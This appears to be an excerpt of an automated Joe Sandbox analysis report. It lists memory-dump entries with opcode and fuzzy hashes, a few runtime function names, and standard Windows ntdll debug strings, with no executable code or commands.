                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000004.00000002.1951601396.0000000001950000.00000040.00001000.00020000.00000000.sdmp, Offset: 01950000, based on PE: true
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_4_2_1950000_x.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID:
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID:
                                                                                                                                              • Opcode ID: 353c6859b01682d039345e4494264dfe06fdd51960215554201bb7ab2d5a6948
                                                                                                                                              • Instruction ID: dcdad3090161a7db6a7d9b1ee173edb8b953805646fdbcb3b97295ea63648437
                                                                                                                                              • Opcode Fuzzy Hash: 353c6859b01682d039345e4494264dfe06fdd51960215554201bb7ab2d5a6948
                                                                                                                                              • Instruction Fuzzy Hash: 2D90023524151402D14171584408606405DA7D0241F95C012E0464554FC6558B56AB62
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000004.00000002.1951601396.0000000001950000.00000040.00001000.00020000.00000000.sdmp, Offset: 01950000, based on PE: true
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_4_2_1950000_x.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID:
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID:
                                                                                                                                              • Opcode ID: c1100bc29833c2672f46db25c2ba94c52820379f26dce6971766e944ea244c20
                                                                                                                                              • Instruction ID: d9cc174322cc3829fd1e38abaa6e24ca7aada0eff480c5e91cf8ea9bfd701315
                                                                                                                                              • Opcode Fuzzy Hash: c1100bc29833c2672f46db25c2ba94c52820379f26dce6971766e944ea244c20
                                                                                                                                              • Instruction Fuzzy Hash: AF900225242551525545B1584408507805AA7E0241795C012E1454950DC5269956D722
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000004.00000002.1951601396.0000000001950000.00000040.00001000.00020000.00000000.sdmp, Offset: 01950000, based on PE: true
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_4_2_1950000_x.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID:
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID:
                                                                                                                                              • Opcode ID: 9a5271f6422a9d94af58dbaa6213cd41ad1c01b50796aab968106f36c57b835a
                                                                                                                                              • Instruction ID: 01fdd57595e83267e69f51b90bff95307d1789cdac22f672514e2e6832691dfb
                                                                                                                                              • Opcode Fuzzy Hash: 9a5271f6422a9d94af58dbaa6213cd41ad1c01b50796aab968106f36c57b835a
                                                                                                                                              • Instruction Fuzzy Hash: C990023520251142954072585808A4E815997E1302B95D415E0055554DC91489615322
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000004.00000002.1951601396.0000000001950000.00000040.00001000.00020000.00000000.sdmp, Offset: 01950000, based on PE: true
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_4_2_1950000_x.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID:
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID:
                                                                                                                                              • Opcode ID: 44cd5d63fed91b9293e36a3d411b37f6879c6ac4bc0fb4c7d6fb3e54c325df8d
                                                                                                                                              • Instruction ID: 4ae93e8e05aee9d25f9bcde0536f779387773c1f6cb614577f3483200256e751
                                                                                                                                              • Opcode Fuzzy Hash: 44cd5d63fed91b9293e36a3d411b37f6879c6ac4bc0fb4c7d6fb3e54c325df8d
                                                                                                                                              • Instruction Fuzzy Hash: 7C90022D21351002D1807158540C60A405997D1202F95D415E0055558DC91589695322
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000004.00000002.1951601396.0000000001950000.00000040.00001000.00020000.00000000.sdmp, Offset: 01950000, based on PE: true
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_4_2_1950000_x.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID:
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID:
                                                                                                                                              • Opcode ID: 0662d54559c6aaff703af87fd5855f0fc667761b5bd0725f811dfe11160f7805
                                                                                                                                              • Instruction ID: 9e0fe6adb4c993197f994b4d4e09f4847da119b1cf6be465b0582f9094f43f78
                                                                                                                                              • Opcode Fuzzy Hash: 0662d54559c6aaff703af87fd5855f0fc667761b5bd0725f811dfe11160f7805
                                                                                                                                              • Instruction Fuzzy Hash: 8B90022520555442D1007558540CA06405997D0205F55D011E10A4595EC6358951A232
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000004.00000002.1951601396.0000000001950000.00000040.00001000.00020000.00000000.sdmp, Offset: 01950000, based on PE: true
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_4_2_1950000_x.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID:
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID:
                                                                                                                                              • Opcode ID: 363c672b17d3bd38892d0e866547f4ad388982d25f0bb7ee270e4a8526790e84
                                                                                                                                              • Instruction ID: b77c03a8c60ba07bd4c216e1afea76bf74c40b62419ed77742342d22190ac7e1
                                                                                                                                              • Opcode Fuzzy Hash: 363c672b17d3bd38892d0e866547f4ad388982d25f0bb7ee270e4a8526790e84
                                                                                                                                              • Instruction Fuzzy Hash: BB90043530151003D140715C541C707C05DF7F1301F55D011F0454554DDD15CD575333
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000004.00000002.1951601396.0000000001950000.00000040.00001000.00020000.00000000.sdmp, Offset: 01950000, based on PE: true
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_4_2_1950000_x.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID:
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID:
                                                                                                                                              • Opcode ID: 896f4235c17a9b0b065a49fba3298da3a0f7ce7bc24b774b078c3c55ebeaa7fc
                                                                                                                                              • Instruction ID: 5862521e1e696b6547f30c069e261b9582636753c802726e28f66ac63d0e35d8
                                                                                                                                              • Opcode Fuzzy Hash: 896f4235c17a9b0b065a49fba3298da3a0f7ce7bc24b774b078c3c55ebeaa7fc
                                                                                                                                              • Instruction Fuzzy Hash: F890023920151402D51071585808646409A97D0301F55D411E0464558EC65489A1A222
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000004.00000002.1951601396.0000000001950000.00000040.00001000.00020000.00000000.sdmp, Offset: 01950000, based on PE: true
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_4_2_1950000_x.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID:
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID:
                                                                                                                                              • Opcode ID: 040ca6bba7caef68bbf5d85b9015da3be974478c3d8f1c375702eb56bd4d9832
                                                                                                                                              • Instruction ID: 8d400246359e1d97cbaad85efbfa3bfd99392d7b1208d3881ca6b44da6168614
                                                                                                                                              • Opcode Fuzzy Hash: 040ca6bba7caef68bbf5d85b9015da3be974478c3d8f1c375702eb56bd4d9832
                                                                                                                                              • Instruction Fuzzy Hash: C790023520151402D1007598540C646405997E0301F55D011E5064555FC66589916232
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000004.00000002.1951601396.0000000001950000.00000040.00001000.00020000.00000000.sdmp, Offset: 01950000, based on PE: true
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_4_2_1950000_x.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID:
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID:
                                                                                                                                              • Opcode ID: 7ec5db2eef4dda03bb4bebc538522aac498f9ee1a787c2d0027a9276249bd276
                                                                                                                                              • Instruction ID: 6351d9158ab334cd1a819017822c798bccec86e7b36086bf879134d55e447e49
                                                                                                                                              • Opcode Fuzzy Hash: 7ec5db2eef4dda03bb4bebc538522aac498f9ee1a787c2d0027a9276249bd276
                                                                                                                                              • Instruction Fuzzy Hash: DD90022560551402D1407158541C706406997D0201F55D011E0064554EC6598B5567A2
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000004.00000002.1951601396.0000000001950000.00000040.00001000.00020000.00000000.sdmp, Offset: 01950000, based on PE: true
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_4_2_1950000_x.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID:
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID:
                                                                                                                                              • Opcode ID: 2c1953deb421477a131fadca0b0299fcdd56621531b04321ac96fb119dd99cca
                                                                                                                                              • Instruction ID: 112d71d5c833dfdc2ea08151aed440113bec682bb8ac733eba433a93957f05f0
                                                                                                                                              • Opcode Fuzzy Hash: 2c1953deb421477a131fadca0b0299fcdd56621531b04321ac96fb119dd99cca
                                                                                                                                              • Instruction Fuzzy Hash: 4B90043530151403D100715C550C707405DD7D0301F55D411F047455CFD757CD517333
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000004.00000002.1951601396.0000000001950000.00000040.00001000.00020000.00000000.sdmp, Offset: 01950000, based on PE: true
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_4_2_1950000_x.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID:
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID:
                                                                                                                                              • Opcode ID: ef947f9c675ffab374824cabfc6c276f72d2f589ee64615750835b57b45a1f6c
                                                                                                                                              • Instruction ID: c25aa850260fe5603b4e0def659b6ca01298c05e4ac714035f1fd1f797d02abb
                                                                                                                                              • Opcode Fuzzy Hash: ef947f9c675ffab374824cabfc6c276f72d2f589ee64615750835b57b45a1f6c
                                                                                                                                              • Instruction Fuzzy Hash: DE90023520151842D10071584408B46405997E0301F55C016E0164654EC615C9517622
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000004.00000002.1951601396.0000000001950000.00000040.00001000.00020000.00000000.sdmp, Offset: 01950000, based on PE: true
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_4_2_1950000_x.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID:
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID:
                                                                                                                                              • Opcode ID: bf6fc482c48ab9feceb91626749b97837aefa064bd72302f43203b3138fd988d
                                                                                                                                              • Instruction ID: 23bbade60665398ba30cb428d171fd7fcde5b02bc357c42c220a8505eb8e8c6e
                                                                                                                                              • Opcode Fuzzy Hash: bf6fc482c48ab9feceb91626749b97837aefa064bd72302f43203b3138fd988d
                                                                                                                                              • Instruction Fuzzy Hash: 5790023520191402D1007158481870B405997D0302F55C011E11A4555EC62589516672
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000004.00000002.1951601396.0000000001950000.00000040.00001000.00020000.00000000.sdmp, Offset: 01950000, based on PE: true
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_4_2_1950000_x.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID:
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID:
                                                                                                                                              • Opcode ID: b43c380fb6e74ff50d9a5d2ca6ed244e99d88d8b3517fde198a777e50cee11fd
                                                                                                                                              • Instruction ID: a52d43c7e73b87aa36572a956ef7e69bea20b09b6fadb015ffdd9f0e96494ab5
                                                                                                                                              • Opcode Fuzzy Hash: b43c380fb6e74ff50d9a5d2ca6ed244e99d88d8b3517fde198a777e50cee11fd
                                                                                                                                              • Instruction Fuzzy Hash: 44900225601510424140716888489068059BBE1211755C121E09D8550EC55989655766
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000004.00000002.1951601396.0000000001950000.00000040.00001000.00020000.00000000.sdmp, Offset: 01950000, based on PE: true
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_4_2_1950000_x.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID:
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID:
                                                                                                                                              • Opcode ID: b60c22fabcb0cfe1d233a7a3b11979ccdd9b12ed0c62ca0ff38a7358d09b3a7a
                                                                                                                                              • Instruction ID: 650a5bf164c59d3c5321ac3618841dfe4394b90cd311526ff5a30eb4719dc052
                                                                                                                                              • Opcode Fuzzy Hash: b60c22fabcb0cfe1d233a7a3b11979ccdd9b12ed0c62ca0ff38a7358d09b3a7a
                                                                                                                                              • Instruction Fuzzy Hash: 8690023520191402D1007158480C747405997D0302F55C011E51A4555FC665C9916632
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000004.00000002.1951601396.0000000001950000.00000040.00001000.00020000.00000000.sdmp, Offset: 01950000, based on PE: true
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_4_2_1950000_x.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID:
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID:
                                                                                                                                              • Opcode ID: 2f52e41b466f3e322fda6fe3e862f4b841ab19449f39bc2bc1ea514934d20c6c
                                                                                                                                              • Instruction ID: 6b24b3112f6e123acd5ecb712ba7c6322ea9076fe4d0ab7007f50286b2e5fad7
                                                                                                                                              • Opcode Fuzzy Hash: 2f52e41b466f3e322fda6fe3e862f4b841ab19449f39bc2bc1ea514934d20c6c
                                                                                                                                              • Instruction Fuzzy Hash: DF900225211D1042D20075684C18B07405997D0303F55C115E0194554DC91589615622
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000004.00000002.1951601396.0000000001950000.00000040.00001000.00020000.00000000.sdmp, Offset: 01950000, based on PE: true
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_4_2_1950000_x.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID:
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID:
                                                                                                                                              • Opcode ID: 32333cf07eeee60f74a8f2657bc1eb1e0db212e3ddea021665058ea99ca05337
                                                                                                                                              • Instruction ID: f68a40978dcd88bb94e3d8068f94fdf4614aeeb4cbefcc0055a4b063f73bb09a
                                                                                                                                              • Opcode Fuzzy Hash: 32333cf07eeee60f74a8f2657bc1eb1e0db212e3ddea021665058ea99ca05337
                                                                                                                                              • Instruction Fuzzy Hash: 9B90026534151442D10071584418B064059D7E1301F55C015E10A4554EC619CD526227
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000004.00000002.1951601396.0000000001950000.00000040.00001000.00020000.00000000.sdmp, Offset: 01950000, based on PE: true
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_4_2_1950000_x.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID:
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID:
                                                                                                                                              • Opcode ID: ea180939a65dd7d020975ea1230f6670ce9b8f659efcde165be2e302ca254570
                                                                                                                                              • Instruction ID: b857f34c96f8514ac7fa7d2dc77e793c59e67417b3e981f3a4edc942b1719e5a
                                                                                                                                              • Opcode Fuzzy Hash: ea180939a65dd7d020975ea1230f6670ce9b8f659efcde165be2e302ca254570
                                                                                                                                              • Instruction Fuzzy Hash: 3390026521151042D10471584408706409997E1201F55C012E2194554DC5298D615226
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000004.00000002.1951601396.0000000001950000.00000040.00001000.00020000.00000000.sdmp, Offset: 01950000, based on PE: true
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_4_2_1950000_x.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID:
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID:
                                                                                                                                              • Opcode ID: 31b6adc3ef4bd48374f8a2e72e2a0cfde07ab62e17489f6f687bce0c04133aae
                                                                                                                                              • Instruction ID: fe050fb4e6ee3e9668c02118a07029c41cc0fbb5b04d6b58b1696cb384ea8cd8
                                                                                                                                              • Opcode Fuzzy Hash: 31b6adc3ef4bd48374f8a2e72e2a0cfde07ab62e17489f6f687bce0c04133aae
                                                                                                                                              • Instruction Fuzzy Hash: 0C90022560151502D10171584408616405E97D0241F95C022E1064555FCA258A92A232
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000004.00000002.1951601396.0000000001950000.00000040.00001000.00020000.00000000.sdmp, Offset: 01950000, based on PE: true
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_4_2_1950000_x.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID:
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID:
                                                                                                                                              • Opcode ID: 73752fbdf876ef544cb49b37d239347306db81591ab95d0fe4431274761d6fb7
                                                                                                                                              • Instruction ID: d26677654e941c34f8a3129b81e81f4dac6f4605a6e62d8e4b7d51b1a54c88f1
                                                                                                                                              • Opcode Fuzzy Hash: 73752fbdf876ef544cb49b37d239347306db81591ab95d0fe4431274761d6fb7
                                                                                                                                              • Instruction Fuzzy Hash: F590027520151402D14071584408746405997D0301F55C011E50A4554FC6598ED56766
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000004.00000002.1951601396.0000000001950000.00000040.00001000.00020000.00000000.sdmp, Offset: 01950000, based on PE: true
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_4_2_1950000_x.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID:
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID:
                                                                                                                                              • Opcode ID: 88408605106e70ea55c2bbb6cf8754d8bd8aaf3d0058e5aecfb1afd914cd21c5
                                                                                                                                              • Instruction ID: e1a6c7c6c6bfa9ea053dd2f4d49f5948f0046de960fe82953ac29fd9a51dc3ea
                                                                                                                                              • Opcode Fuzzy Hash: 88408605106e70ea55c2bbb6cf8754d8bd8aaf3d0058e5aecfb1afd914cd21c5
                                                                                                                                              • Instruction Fuzzy Hash: 1690026520191403D14075584808607405997D0302F55C011E20A4555FCA298D516236
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000004.00000002.1951601396.0000000001950000.00000040.00001000.00020000.00000000.sdmp, Offset: 01950000, based on PE: true
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_4_2_1950000_x.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID:
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID:
                                                                                                                                              • Opcode ID: f2160912a8d8bef4f69023aff85e5bf09481a3a3958778658d99e92f201dea2f
                                                                                                                                              • Instruction ID: 2c32f3c631173e29b53e2c23301e06e90e0e535c71c9251b74d58e31216b1d62
                                                                                                                                              • Opcode Fuzzy Hash: f2160912a8d8bef4f69023aff85e5bf09481a3a3958778658d99e92f201dea2f
                                                                                                                                              • Instruction Fuzzy Hash: 0690022530151402D10271584418606405DD7D1345F95C012E1464555EC6258A53A233
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000004.00000002.1951601396.0000000001950000.00000040.00001000.00020000.00000000.sdmp, Offset: 01950000, based on PE: true
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_4_2_1950000_x.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID:
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID:
                                                                                                                                              • Opcode ID: a3d3d3c0123cddb368cc51eab9da9c3aaeeac76cd7bbfae310620ba6f7f49b43
                                                                                                                                              • Instruction ID: 43c683df09aab794adfa1a4cb48f3dea64bd3df98f4f26d5149249ec5ab77c83
                                                                                                                                              • Opcode Fuzzy Hash: a3d3d3c0123cddb368cc51eab9da9c3aaeeac76cd7bbfae310620ba6f7f49b43
                                                                                                                                              • Instruction Fuzzy Hash:
                                                                                                                                              APIs
                                                                                                                                              Strings
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000004.00000002.1951601396.0000000001950000.00000040.00001000.00020000.00000000.sdmp, Offset: 01950000, based on PE: true
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_4_2_1950000_x.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: ___swprintf_l
                                                                                                                                              • String ID: :%u.%u.%u.%u$::%hs%u.%u.%u.%u$::ffff:0:%u.%u.%u.%u$ffff:
                                                                                                                                              • API String ID: 48624451-2108815105
                                                                                                                                              • Opcode ID: 750b29e9f796593513e87181a2ef6e481d7003ff89699457f0d3a34adc6f25e7
                                                                                                                                              • Instruction ID: 88b81df4f083abb3a59027d6bce9cf9f09ca10dfc85352901496947e2cfd0788
                                                                                                                                              • Opcode Fuzzy Hash: 750b29e9f796593513e87181a2ef6e481d7003ff89699457f0d3a34adc6f25e7
                                                                                                                                              • Instruction Fuzzy Hash: A751D5B6A00116BFDB11DF9CC99097EFBB8BB48641B14C12DE5ADD7642D334DE4087A1
                                                                                                                                              Strings
                                                                                                                                              • CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ, xrefs: 019F4725
                                                                                                                                              • CLIENT(ntdll): Processing section info %ws..., xrefs: 019F4787
                                                                                                                                              • CLIENT(ntdll): Processing %ws for patching section protection for %wZ, xrefs: 019F4742
                                                                                                                                              • CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions, xrefs: 019F4655
                                                                                                                                              • Execute=1, xrefs: 019F4713
                                                                                                                                              • ExecuteOptions, xrefs: 019F46A0
                                                                                                                                              • CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database, xrefs: 019F46FC
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000004.00000002.1951601396.0000000001950000.00000040.00001000.00020000.00000000.sdmp, Offset: 01950000, based on PE: true
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_4_2_1950000_x.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID:
                                                                                                                                              • String ID: CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions$CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ$CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database$CLIENT(ntdll): Processing %ws for patching section protection for %wZ$CLIENT(ntdll): Processing section info %ws...$Execute=1$ExecuteOptions
                                                                                                                                              • API String ID: 0-484625025
                                                                                                                                              • Opcode ID: ff31e65fd3fde41987eeb40892b9208fe3cc532ce089db043e452eae360bcf5d
                                                                                                                                              • Instruction ID: 47048274a5cdbb71085f260ada55b99ffa0f97f27bf531e215e7e6fc89041843
                                                                                                                                              • Opcode Fuzzy Hash: ff31e65fd3fde41987eeb40892b9208fe3cc532ce089db043e452eae360bcf5d
                                                                                                                                              • Instruction Fuzzy Hash: 57512A31A00209BBEF25AAE8DDD5FEA77ACAF98705F0401ADD60DA71C0D7719A418F51
                                                                                                                                              APIs
                                                                                                                                              Strings
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000004.00000002.1951601396.0000000001950000.00000040.00001000.00020000.00000000.sdmp, Offset: 01950000, based on PE: true
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_4_2_1950000_x.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: __aulldvrm
                                                                                                                                              • String ID: +$-$0$0
                                                                                                                                              • API String ID: 1302938615-699404926
                                                                                                                                              • Opcode ID: 67cbaaaa089a52c9565608c335445b38513441175a6f8a80d34fd58ab3f25221
                                                                                                                                              • Instruction ID: b79bb41730009d6e01d013d65c12ee40121c3f794b83503849f32002282d8b69
                                                                                                                                              • Opcode Fuzzy Hash: 67cbaaaa089a52c9565608c335445b38513441175a6f8a80d34fd58ab3f25221
                                                                                                                                              • Instruction Fuzzy Hash: 8381D130E012498EEF258E6CC9527FEBBB9AF44BA1F18451DD8DAA7691C73489408B53
                                                                                                                                              Strings
                                                                                                                                              • RTL: Acquire Exclusive Sem Timeout %d (%I64u secs), xrefs: 019F7B7F
                                                                                                                                              • RTL: Resource at %p, xrefs: 019F7B8E
                                                                                                                                              • RTL: Re-Waiting, xrefs: 019F7BAC
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000004.00000002.1951601396.0000000001950000.00000040.00001000.00020000.00000000.sdmp, Offset: 01950000, based on PE: true
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_4_2_1950000_x.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID:
                                                                                                                                              • String ID: RTL: Acquire Exclusive Sem Timeout %d (%I64u secs)$RTL: Re-Waiting$RTL: Resource at %p
                                                                                                                                              • API String ID: 0-871070163
                                                                                                                                              • Opcode ID: 2699cd45453befed7d32db18bd41f5751ce1fc174abd4d2cec5e848caca3e702
                                                                                                                                              • Instruction ID: d3cb9b452140f0640487381e44fc6ddd1dbb88e42b9ac093ba2dc9d3d8f1970b
                                                                                                                                              • Opcode Fuzzy Hash: 2699cd45453befed7d32db18bd41f5751ce1fc174abd4d2cec5e848caca3e702
                                                                                                                                              • Instruction Fuzzy Hash: 2141E2317047069FD725DE29C980BAAB7E9EF89712F100A1DEA9E972C0DB31E4058B91
                                                                                                                                              APIs
                                                                                                                                              • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 019F728C
                                                                                                                                              Strings
                                                                                                                                              • RTL: Acquire Shared Sem Timeout %d(%I64u secs), xrefs: 019F7294
                                                                                                                                              • RTL: Resource at %p, xrefs: 019F72A3
                                                                                                                                              • RTL: Re-Waiting, xrefs: 019F72C1
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000004.00000002.1951601396.0000000001950000.00000040.00001000.00020000.00000000.sdmp, Offset: 01950000, based on PE: true
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_4_2_1950000_x.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@
                                                                                                                                              • String ID: RTL: Acquire Shared Sem Timeout %d(%I64u secs)$RTL: Re-Waiting$RTL: Resource at %p
                                                                                                                                              • API String ID: 885266447-605551621
                                                                                                                                              • Opcode ID: a888906cd25324403ba86b47d495ca0e756f7dbb9de503bc915b9a22d564cb7b
                                                                                                                                              • Instruction ID: 4cd878bf12a340f73a437c2286dd86f6b38fc3316dd55271c13fa47a76b36b13
                                                                                                                                              • Opcode Fuzzy Hash: a888906cd25324403ba86b47d495ca0e756f7dbb9de503bc915b9a22d564cb7b
                                                                                                                                              • Instruction Fuzzy Hash: FB410535700206AFD725DE69CD81FAAB7A5FB94B11F10061DFA5DA7280DB30F80187D1
                                                                                                                                              APIs
                                                                                                                                              Strings
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000004.00000002.1951601396.0000000001950000.00000040.00001000.00020000.00000000.sdmp, Offset: 01950000, based on PE: true
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_4_2_1950000_x.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: __aulldvrm
                                                                                                                                              • String ID: +$-
                                                                                                                                              • API String ID: 1302938615-2137968064
                                                                                                                                              • Opcode ID: 99ca5d320493ee8ecfac6479c2384e7848b43d072adb6e2058c73728248a7f31
                                                                                                                                              • Instruction ID: d355c86e44232ad6e700b0e34ea7aedb8d74ec84295209b4a83760a71eb4fbca
                                                                                                                                              • Opcode Fuzzy Hash: 99ca5d320493ee8ecfac6479c2384e7848b43d072adb6e2058c73728248a7f31
                                                                                                                                              • Instruction Fuzzy Hash: FF91A871E002179BDB28DFADC881ABE7BA9AF44B21F54451EE9DDE72D0D73099408F12
                                                                                                                                              Strings
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000004.00000002.1951601396.0000000001950000.00000040.00001000.00020000.00000000.sdmp, Offset: 01950000, based on PE: true
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_4_2_1950000_x.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID:
                                                                                                                                              • String ID: $$@
                                                                                                                                              • API String ID: 0-1194432280
                                                                                                                                              • Opcode ID: 029dde6fe45c6aa00350963ab254fa03b7c1f1cb707497ee9d0ac29dcdb44b11
                                                                                                                                              • Instruction ID: e324a18db8258259025b44936df03bd34e3b36c1d39e75ea0d1eb3e0e936334f
                                                                                                                                              • Opcode Fuzzy Hash: 029dde6fe45c6aa00350963ab254fa03b7c1f1cb707497ee9d0ac29dcdb44b11
                                                                                                                                              • Instruction Fuzzy Hash: 2E811B75D002699BDB32DB54CC44BEEB7B8BB48714F0041EAAA1DB7640D7709E85CFA0